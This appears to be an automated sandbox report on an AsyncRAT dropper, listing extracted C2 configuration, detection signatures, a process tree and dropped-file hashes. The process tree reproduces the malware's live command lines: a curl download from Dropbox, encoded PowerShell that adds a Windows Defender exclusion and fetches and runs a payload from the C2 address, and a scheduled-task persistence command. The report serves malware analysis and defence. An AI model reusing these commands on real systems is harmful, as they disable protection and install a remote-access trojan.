Analysis
-
max time kernel
4s -
max time network
25s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
29/03/2025, 23:26
Static task
static1
Behavioral task
behavioral1
Sample
evo.gj.exe
Resource
win7-20240903-en
General
-
Target
evo.gj.exe
-
Size
2.8MB
-
MD5
dee0ebab182b215c4e1fb1c7da903d8a
-
SHA1
84c3444a053cb709a4dd9b9928b40b4373b78732
-
SHA256
49fcfcbb8cc1c85f2c7ec36eb139df3b70b898689b8e7f58b7c054ca900a9ce4
-
SHA512
fa9c0d00dfb679a4d1c324390bcf2f8d562cf779e4f5487cb508f7167842c3453f545db593a218df3633aa36de98578115b9eaff7cd7b59969b1b264f78deb5c
-
SSDEEP
49152:z7YGtlq/IU6iZXNVxrGiPsPAmpoAzjicaCNH2kLLKevfQfGVGNPq0ATmn9/:X9+brGiPoB421fQOVGU05
Malware Config
Extracted
http://3.27.199.84:3000/RuntimeBrokerSvc.exe
Extracted
asyncrat
0.5.8
Default
3.27.199.84:9182
gRLpFG01LHh3
-
delay
3
-
install
true
-
install_file
RuntimeBrokerSvc.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000024188-333.dat family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3468 powershell.exe -
Downloads MZ/PE file
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 38 discord.com 39 discord.com 40 discord.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\a.txt wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2084 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2700 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3132 evo.gj.exe 3132 evo.gj.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 3768 msedge.exe 3768 msedge.exe 3768 msedge.exe 3768 msedge.exe 3768 msedge.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3768 msedge.exe 3768 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3132 wrote to memory of 628 3132 evo.gj.exe 87 PID 3132 wrote to memory of 628 3132 evo.gj.exe 87 PID 628 wrote to memory of 3768 628 cmd.exe 88 PID 628 wrote to memory of 3768 628 cmd.exe 88 PID 3132 wrote to memory of 4004 3132 evo.gj.exe 90 PID 3132 wrote to memory of 4004 3132 evo.gj.exe 90 PID 4004 wrote to memory of 4112 4004 cmd.exe 91 PID 4004 wrote to memory of 4112 4004 cmd.exe 91 PID 3768 wrote to memory of 4652 3768 msedge.exe 93 PID 4112 wrote to memory of 2892 4112 cmd.exe 92 PID 3768 wrote to memory of 4652 3768 msedge.exe 93 PID 4112 wrote to memory of 2892 4112 cmd.exe 92 PID 3768 wrote to memory of 2688 3768 msedge.exe 94 PID 3768 wrote to memory of 2688 3768 msedge.exe 94 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95 PID 3768 wrote to memory of 4884 3768 msedge.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\evo.gj.exe"C:\Users\Admin\AppData\Local\Temp\evo.gj.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start https://discord.gg/7drg5EN8hm2⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/7drg5EN8hm3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2dc,0x7fff4e6ef208,0x7fff4e6ef214,0x7fff4e6ef2204⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:34⤵PID:2688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:24⤵PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2448,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:84⤵PID:4560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3540,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:14⤵PID:5108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:14⤵PID:2692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4252,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:14⤵PID:4424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4260,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:24⤵PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5184 /prefetch:84⤵PID:2500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3840,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3916 /prefetch:84⤵PID:1128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5340,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5500 /prefetch:14⤵PID:4208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5728,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:84⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5720,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=5780 /prefetch:84⤵PID:4632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=6048 /prefetch:84⤵PID:1888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5172,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=6008 /prefetch:84⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3928 /prefetch:84⤵PID:388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5316,i,15990004024342647309,1738625314383668889,262144 --variations-seed-version --mojo-platform-channel-handle=3928 /prefetch:84⤵PID:428
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1" > NUL 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\system32\cmd.execmd /c curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"3⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\system32\curl.execurl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"4⤵PID:2892
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wscript "C:\Windows\Temp\buildtools.js"2⤵PID:1824
-
C:\Windows\system32\wscript.exewscript "C:\Windows\Temp\buildtools.js"3⤵
- Drops file in System32 directory
PID:3532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnACIAOwAgAHIAZQBnACAAYQBkAGQAIAAnAEgASwBMAE0AXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABFAHgAYwBsAHUAcwBpAG8AbgBzAFwAUABhAHQAaABzACcAIAAvAHYAIAAnAEMAOgBcACcAIAAvAHQAIABSAEUARwBfAFMAWgAgAC8AZAAgACcAQwA6AFwAJwAgAC8AZgA=4⤵PID:3792
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
PID:3468
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t REG_SZ /d C:\ /f5⤵PID:3912
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEASABSADAAYwBEAG8AdgBMAHoATQB1AE0AagBjAHUATQBUAGsANQBMAGoAZwAwAE8AagBNAHcATQBEAEEAdgBVAG4AVgB1AGQARwBsAHQAWgBVAEoAeQBiADIAdABsAGMAbABOADIAWQB5ADUAbABlAEcAVQA9ACcAKQApACAACgAkAEIAMgAgAD0AIAAiACQAKAAkAGUAbgB2ADoAVABlAG0AcAApAFwAJAAoACgAJwBSACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMgBdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAEIAJwArACgAJwByACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMQBdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAGsAJwArACgAJwBlACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMABdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAHIAJwArACcALgBlAHgAZQAnACkAIgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAEEAMQAgAC0ATwB1AHQARgBpAGwAZQAgACQAQgAyAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABCADIA4⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\RBrker.exe"C:\Users\Admin\AppData\Local\Temp\RBrker.exe"5⤵PID:4688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"' & exit6⤵PID:4044
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:2700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE659.tmp.bat""6⤵PID:3812
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:2084
-
-
C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"7⤵PID:736
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3860
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
6KB
MD55bfb86760a77a79d3755f852ad29fa91
SHA1ae26552a3d4add5f99bbcd835d1b9217ce14c08d
SHA256378d51134523e01ec5533a75b4aed8caed3afeb3eea35dca734d39b345befcb7
SHA512809f1778624ec44ed616a0f59701b6a2992a465568ebff99804716307edabc78fe1171be997fe143eefa960bfddbc1d3b3afbbacf04a005a048913993d0ef10f
-
Filesize
280B
MD50db1d88802048ff847bfcf47035335bd
SHA1bb54059e5b145da464f6521ae67353889ce00771
SHA256416525d2bfeaeab0950175c0eab55ad35e84518ef5299f10565023800788cf9a
SHA51232c5b42febdb38c3a30eb5179b8aa20a5e731b0e83aab16ec73d27b4108bfc89eb6316f71a988388cb5df19267ba823f6d0220fab5584667ba0adb0da1152a30
-
Filesize
280B
MD58734b4a181214bb62f91cfa36c7e2c98
SHA19cff323f10778a23d73ac3dcffc038d3bf661b78
SHA256e06afe980fa56c8dad3e7c6b8d0d8f1e7eb9a4860ac715e966026fb7631c3ba5
SHA512e8648a54da9aa24b6cba1f0377a0ce33979ea097554bb6347f252cad894ad4134e1fe839abc80eb48e2510061d5c6937e80374d32f95afd4cc8567b57694ac36
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
12KB
MD59c7f565c1b8b562fea0a24a8afc3c597
SHA1494dabefceb7cd66b1b82932f5df127688a30808
SHA256326130a000eaa5b78e417ad65859f5b39467c6d629ac3f98d29fccb8c265a22d
SHA512817741e8b64dc6ad624d0e4b38a1ee37e1aa97e5b83b56305b583f2644f455f64553647b3850a9158087ce0e728fd528443fa204af3390880e92cfc0d7e53c6a
-
Filesize
10KB
MD56397662a7f1aceb98736365e763e43d2
SHA16d79861a8b532367089f4f38c7f0b952b7860727
SHA256d5516c36988c940ecab999bfa467c61767fb1480b8823fb12c2a870da303dda4
SHA5126f9a77e2d188367fa155f5e9ccaa41e1ca873d97763e26e278fa8b7f9dd8576d38dcf8a7fa4f614be317c82b8ffc5c78db84a0e7c78f6de75b90912d493fa413
-
Filesize
27KB
MD585d4bd2c164ac8201556f6ca04a10303
SHA1dd713a386987b1f5420c8094dc2c8fc0a5682bfc
SHA2568f0f68d0ab910dd7a78653122e3757164dd643253ef5b3004e2094f84646794e
SHA512e1b785614ebd4c7bd54e88c8abfa32c8f385024275b6365525290dcd36a8b2f57864dbb1c4a185088faa35c2e9d3405268275582e4dd02ee73656041bc7a30ef
-
Filesize
12KB
MD54f3599575385a6de711a0666905df548
SHA19e3d9a899bc125e5b2440dbdbdb9144f85adfeec
SHA25680ce0fbbb5f58367ca60792d2e77077d28ed4d8982a34bd6dcf4ce82aff10b42
SHA512d5036ce94934b2719e97039695404fb17f7fa67554e08381d3f399f43cd7352c738959dae159a71e1ed1736b79f269eff47fee34a757c4f18a9a83dec2070008
-
Filesize
12KB
MD5aff314423d9f45f13bc7a0bcfdcac8f6
SHA196c1e42dbc8e527f0d83e73f1f57fc845a62af97
SHA25631f45896870cda78e4a644e6e7321f6f3f5d2f47193a7244519abd55cea827cc
SHA51257ca272811f545573e62f5bb736236466ffc55dc8b534b48feb00edc766ac959bc8868506c46a3813aa19a81601d39dd4c8289fb4ee96573483ec4638b79ffc3
-
Filesize
7KB
MD5ee66586efd247bd302d6ad493d564eb0
SHA163dcdc386a46478f668229bf7475ff9a430c4491
SHA2566bfc1ae4bcbbfd34e39deabc6e20fc2d5c0c83556f7bfbc7f51134cf5d5bb725
SHA512974189167136e3077eb014232bca6b449b079dbb86aa6dca6443c5765f59a5a46c89f31dc7d0c7e0b3b9620866a9240c84dcb7d6f0ce53090eb6ee1b5cbab717
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD51a6ddfa543c440a859a51adf665365fa
SHA14becb8a63efceace76207572984b7e340c28fc54
SHA25641803f3dbca5bbea6f8987d64e9375d5a231917682e6668aeaae540d61ab4fb2
SHA512d372138ba0f46f5bf0cd720efc69ab1d50c047b9edefdde59471b14ae1360c91e381374cc6f6d53fa10614a012cdee4bd8fc45b8e7f7a00fb135fba0190f9a84
-
Filesize
64B
MD52b5631c2923d86fc9a026dd9cfe44187
SHA1bea53b84a25af630b61436269947d635050faffd
SHA2563cf795c0745b1f062b1f4da926c6dbfb9e74d61e49f63ca142bb343cf2941ba5
SHA512808099a48f70c2dff24dc05098285c8d4de2bceb3d8521dfb5258dfd0430f42eec5cd2d02eb4268a7db2a07518efcdbaea5e5f402dc1afb9feb826c56893669b
-
Filesize
1KB
MD56fab1e187ad4914b81eb556f57680330
SHA14c2e5c80c9193bdc108dd44042e5c1de3723129c
SHA256c64a8d84b6a4c3b87766cac00b313c473fd10af79b88340a0ebe36e273e92ec2
SHA5121eb837c2f0521aa8703b5a0a6238de3851ca4e36842d853672a6d8fb4c76c62b443ee757265612d3464d733e6c635a51b5a42f8b17a6c106119fa2e8d5478919
-
Filesize
47KB
MD5ee9bd2b3d64511b880fcbd8ad23c71fa
SHA18c2cc8c959621c4543c9aa111367adb77f1ec697
SHA256040ef285cdbca1ab4b3ceaeac8f0ace87aca7d2147123a1359f27a3039b0b700
SHA51247c90a3a2093796a8b324fd76f92bc6f5a3975272f88305352d3e9c4fcd543f2c2421d7ed0d95e9df0cda33e6fb58b2a10c3a400bdeb6c1cb4912d50970623ec
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
160B
MD5545767c55eed247ab32fab4ada992cd6
SHA1b60523405d39d3f24a0c50ceb16141a6c718b649
SHA25600ecd01181a2220ae8b4a56be3d6ad9bdcf52a24486905fc90c877b494b26d59
SHA512541b5b529492575af4d1902c19e38e664e823189d65239ea66c442285cac07aecaa96154a5a96bcfda493ea66bcf3557d2986f4230af33f8faf25166246e14a2
-
Filesize
1KB
MD51cad2cafba69dfd93fd369cac5d7f332
SHA11d5b120a9cf6c14c6539bb482c0d31eb39a59216
SHA256e91cb124ad396e993ce57407e3759efd9c4a577c5c6c0bcdf7c26a5bbe58a861
